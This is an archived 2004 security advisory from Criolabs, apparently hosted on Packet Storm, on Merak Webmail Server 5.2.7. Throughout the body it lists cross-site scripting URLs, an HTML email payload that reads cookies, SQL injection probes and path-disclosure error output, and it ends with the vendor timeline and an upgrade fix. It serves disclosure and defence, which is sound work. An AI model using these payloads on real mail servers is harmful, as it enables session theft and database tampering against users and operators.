exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

merak527.txt

merak527.txt
Posted Aug 19, 2004
Site criolabs.net

Merak Webmail server version 5.2.7 has cross site scripting, full path disclosure, exposure of PHP files, and SQL injection vulnerabilities.

tags | exploit, php, vulnerability, xss, sql injection
SHA-256 | 089caf859e10b39bd0ac02efa7546f2409a15eceb1de9ca5a88018b1f271135d

merak527.txt

Change Mirror Download
****************************************************************************************************
CRIOLABS
https://www.criolabs.net


- Software: Merak Webmail Server
- Type: Webmail
- Company: Merak Mail Server, Inc.



****************************************************************************************************



## Software ##

Software: Merak Webmail Server
Version: 5.2.7
Plataforms: All Windows platforms
Web: https://www.merakmailserver.com/


## Vendor Description ##

Merak's WebMail Server is used by thousands of companies around the world to provide secure (ssl) anytime-anywhere access to home, office or ISP email via a browser or WAP-enabled device.

In less than 10 minutes you can have the same professional email server that organizations such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and Developers depend on every day.



## Vulnerabilities ##

Cross-Site Scripting, Full path disclosure, Exposure of PHP files, SQL-Injection.



## Cross-Site Scripting ##


There are a lot of Input Validation Holes in this soft. An attacker can perform an XSS attack and be able to access the target user's cookies.


/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]

/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=

/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=

/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=

/settings.html?autoresponder=1&id=[id]&spage=">[XSS]

/settings.html?autoresponder=">[XSS]&id=[id]&spage=0

/readmail.html?id=[id]&folder=">[XSS]


The next files (attachment.html,calendar.html), can be executed without knowing user's session ID number.


/attachment.html?attachmentpage_text_error=">[XSS]

/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=<script>alert()</script>

/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]

/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8



Also it is possible to inject a XSS in the message directly, example:

Open your mail and write a new message like this :

#Image 1.jpg

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="https://www.google.com"></body> </html> </IFRAME>

Then click on the HTML message checkbox (in order to send it in HTML format) -

#Image 2.jpg and 3.jpg

The XSS will be executed on your browser. If you send the message, the XSS also will be executed when the victim read the mail.

#Image 4.jpg


Conclusion: If you send a Content-Type: text/html message with an XSS attack, always will be executed when the victim reads the message.

Also you can send the XSS in the Subject. This XSS is executed when the victim reply to this is in HTML format.





## Full path disclosure ##

Some variables of adress.html can cause that a remote user may be able to determine the installation path.




#Example:


/mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=


#Error Example:

Warning: reset(): Passed variable is not an array or object in C:\Archivos de programa\Merak\html\mail\address.html on line 565

Warning: Variable passed to each() is not an array or object in C:\Archivos de programa\Merak\html\mail\address.html on line 566

Warning: reset(): Passed variable is not an array or object in C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line 100

Warning: Variable passed to each() is not an array or object in C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line 101





#Example:

/calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs


#Error Example:

You can see this in the webmail logs:

Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 413

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 413

Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 417

Warning: mktime(): Windows does not support negative values for this function in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 420

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 420

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in C:\Archivos de programa\Merak\html\mail\inc\function.calendar.php on line 350





## Exposure of PHP files ##


The server allows that remote users can download all the files with .php extension from the server.


#Example:

https://localhost:32000/mail/inc/function.php
https://localhost:32000/mail/inc/function.view.php



## SQL-Injection ##



There are Sql-Injection problems in calendar, a remote user may be able to inject SQL commands.

/calendar.html?id=1'&schedule=[SQL]

You can see in the logs :

DB Calendaring Error
[Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis (falta operador) en la expresión de consulta 'OWN_Email = ''[sql]''.


/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'

DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'EVN_ID = 'criolabs'''.

DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'RMNEVN_ID = 'criolabs'''.

DB Calendaring Error [Microsoft][Controlador ODBC Microsoft Access]
Error de sintaxis en la cadena en la expresión de consulta 'CNTEVN_ID = 'criolabs'''.

-- --


## History ##

Vendor Contacted : Wed, 04 Aug 2004

Thu, 12 Aug 2004 : New Release of Merak Mail Server 7.5.2



## Solution ##

Download the new release.
https://www.MerakMailServer.com/Download/


## Credits ##

Criolabs staff
https://www.criolabs.net
Ariginal advisory and attachments in Criolabs.net
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close